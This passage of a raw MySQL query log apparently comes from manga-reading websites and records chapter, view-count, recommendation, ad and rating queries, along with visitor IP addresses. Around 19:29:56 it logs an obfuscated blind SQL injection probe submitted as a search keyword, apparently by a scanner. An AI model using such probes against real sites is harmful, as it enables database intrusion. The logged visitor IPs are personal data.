'%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330658107 Quit 330658108 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658109 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658108 Quit 330658109 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658109 Quit 330658110 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658111 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658110 Quit 330658111 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658111 Quit 330658112 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658113 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658112 Quit 330658113 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658113 Quit 330658114 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658115 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658114 Quit 330658115 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658115 Quit 260225 19:29:55 330658116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658116 Quit 330658118 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15995' 330658119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658119 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15996' 330658117 Quit 330658118 Quit 330658119 Quit 330658120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658120 Query select * FROM chapters where id = '15995' 330658121 Query select * FROM chapters where id = '15996' 330658120 Quit 330658121 Quit 330658122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658122 Query select * FROM chapters where manga_id = '197' order by id desc 330658123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658123 Query select * FROM chapters where manga_id = '197' order by id desc 330658123 Quit 330658124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658124 Query Update chapters set view=view+1 where id = '15996' 330658122 Quit 330658125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658125 Query Update chapters set view=view+1 where id = '15995' 330658124 Quit 330658126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658126 Query select * FROM chapters where id = '15996' 330658125 Quit 330658126 Quit 330658127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658127 Query select * FROM chapters where id = '15995' 330658128 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15996' 330658129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658129 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '15995' 330658127 Quit 330658128 Quit 330658129 Quit 330658130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658130 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '15995', '51.39.246.67', 'mangacherri.com', '2026-02-26 03:29:55', '2026-02-26 03:29:55') 330658131 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '15996', '51.39.246.67', 'mangacherri.com', '2026-02-26 03:29:55', '2026-02-26 03:29:55') 330658131 Quit 330658130 Quit 330658132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658132 Query select * FROM chapter_images where chapter_id = '15996' 330658133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658133 Query select * FROM chapter_images where chapter_id = '15995' 330658132 Quit 330658133 Quit 330658134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658134 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330658135 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330658135 Quit 330658136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658136 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330658134 Quit 330658137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658137 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330658138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658139 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17526' 330658138 Quit 330658139 Quit 330658140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658140 Query select * FROM chapters where id = '17526' 330658140 Quit 330658141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658141 Query select * FROM chapters where manga_id = '252' order by id desc 330658141 Quit 330658142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658142 Query Update chapters set view=view+1 where id = '17526' 330658142 Quit 330658143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658143 Query select * FROM chapters where id = '17526' 330658144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658143 Quit 330658144 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17526' 330658145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658145 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('252', '17526', '84.47.254.20', 'mangacherri.com', '2026-02-26 03:29:55', '2026-02-26 03:29:55') 330658144 Quit 330658145 Quit 330658146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658146 Query select * FROM chapter_images where chapter_id = '17526' 330658146 Quit 330658147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658147 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '252' and m.active = 1 330658147 Quit 330658148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658148 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='252' and m.active = 1 AND (genres like '%Manhwa%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330658149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658149 Quit 330658150 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17312' 330658150 Quit 330658151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658151 Query select * FROM chapters where id = '17312' 330658151 Quit 330658152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658152 Query select * FROM chapters where manga_id = '350' order by id desc 330658152 Quit 330658153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658153 Query Update chapters set view=view+1 where id = '17312' 330658153 Quit 330658154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658154 Query select * FROM chapters where id = '17312' 330658155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658154 Quit 330658155 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17312' 330658155 Quit 330658156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658156 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('350', '17312', '2409:40c2:311f:c1c6:8000::', 'mangacherri.com', '2026-02-26 03:29:55', '2026-02-26 03:29:55') 330658156 Quit 330658157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658157 Query select * FROM chapter_images where chapter_id = '17312' 330658157 Quit 330658158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658158 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '350' and m.active = 1 330658158 Quit 330658159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658159 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='350' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330658136 Quit 330658137 Quit 330658160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658160 Quit 330658161 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658161 Quit 330658162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658162 Quit 330658163 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658163 Quit 330658164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658164 Quit 330658165 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658165 Quit 330658166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658166 Quit 330658167 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658167 Quit 330658148 Quit 330658168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658168 Quit 330658169 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658169 Quit 330658170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658170 Quit 330658171 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658171 Quit 330658172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658172 Quit 330658173 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658173 Quit 330658174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658174 Quit 330658175 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658175 Quit 260225 19:29:56 330658176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658176 Quit 330658177 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1ANd//8063((SelEcT//casE//8063//whEn//8063//ThEN//1//ELSE//0//enD//froM//RdBdAtAbaSE)) AND yzeg55cKy', '169.150.196.30', '2026-02-26 03:29:56') 330658177 Quit 330658178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658178 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1ANd//8063((SelEcT//casE//8063//whEn//8063//ThEN//1//ELSE//0//enD//froM//RdBdAtAbaSE)) AND yzeg55cKy%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1ANd//8063((SelEcT//casE//8063//whEn//8063//ThEN//1//ELSE//0//enD//froM//RdBdAtAbaSE)) AND yzeg55cKy%' ) ) 330658179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658178 Quit 330658179 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\"%A%N%d%/%*%*%/%8%0%6%3%=%(%\'%~%\'%|%|%(%S%e%l%E%c%T%/%*%*%/%c%a%s%E%/%*%*%/%8%0%6%3%/%*%*%/%w%h%E%n%/%*%*%/%8%0%6%3%/%*%*%/%T%h%E%N%/%*%*%/%1%/%*%*%/%E%L%S%E%/%*%*%/%0%/%*%*%/%e%n%D%/%*%*%/%f%r%o%M%/%*%*%/%R%d%B%$%d%A%t%A%b%a%S%E%)%|%|%\'%~%\'%) AND \"yzeg55cK\"=\"yzeg55cK\"' 330658179 Quit 330658180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658180 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330658180 Quit 330658181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658181 Quit 330658182 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658182 Quit 330658183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330658183 Quit 330658184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330658184 Quit 330658185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330658185 Quit 330658186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330658186 Quit 330658187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330658187 Quit 330658188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330658188 Quit 330658189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330658189 Quit 330658190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330658190 Quit 330658191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330658191 Quit 330658192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330658192 Quit 330658193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330658193 Quit 330658194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330658194 Quit 330658195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330658195 Quit 330658196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330658196 Quit 330658197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330658197 Quit 330658198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330658198 Quit 330658199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330658199 Quit 330658200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330658200 Quit 330658201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330658201 Quit 330658202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330658202 Quit 330658203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330658203 Quit 330658204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330658204 Quit 330658205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330658205 Quit 330658206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330658206 Quit 330658207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330658207 Quit 330658208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330658208 Quit 330658209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330658209 Quit 330658210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330658210 Quit 330658211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330658211 Quit 330658212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330658212 Quit 330658213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330658213 Quit 330658214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330658214 Quit 330658215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330658215 Quit 330658216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330658216 Quit 330658217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330658217 Quit 330658218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330658218 Quit 330658219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330658219 Quit 330658220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330658220 Quit 330658221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330658221 Quit 330658222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330658222 Quit 330658223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330658223 Quit 330658224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330658224 Quit 330658225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330658225 Quit 330658226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330658226 Quit 330658227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330658227 Quit 330658228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330658228 Quit 330658229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330658229 Quit 330658230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330658230 Quit 330658231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330658231 Quit 330658232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330658232 Quit 330658233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330658233 Quit 330658234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330658234 Quit 330658235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330658235 Quit 330658236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330658236 Quit 330658237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330658237 Quit 330658238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330658238 Quit 330658239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330658239 Quit 330658240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330658240 Quit 330658241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330658241 Quit 330658242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330658242 Quit 330658243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330658243 Quit 330658244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330658244 Quit 330658245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330658245 Quit 330658246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330658246 Quit 330658247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330658247 Quit 330658248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330658248 Quit 330658249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330658249 Quit 330658250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330658250 Quit 330658251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330658251 Quit 330658252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330658252 Quit 330658253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330658253 Quit 330658254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330658254 Quit 330658255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330658255 Quit 330658256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating 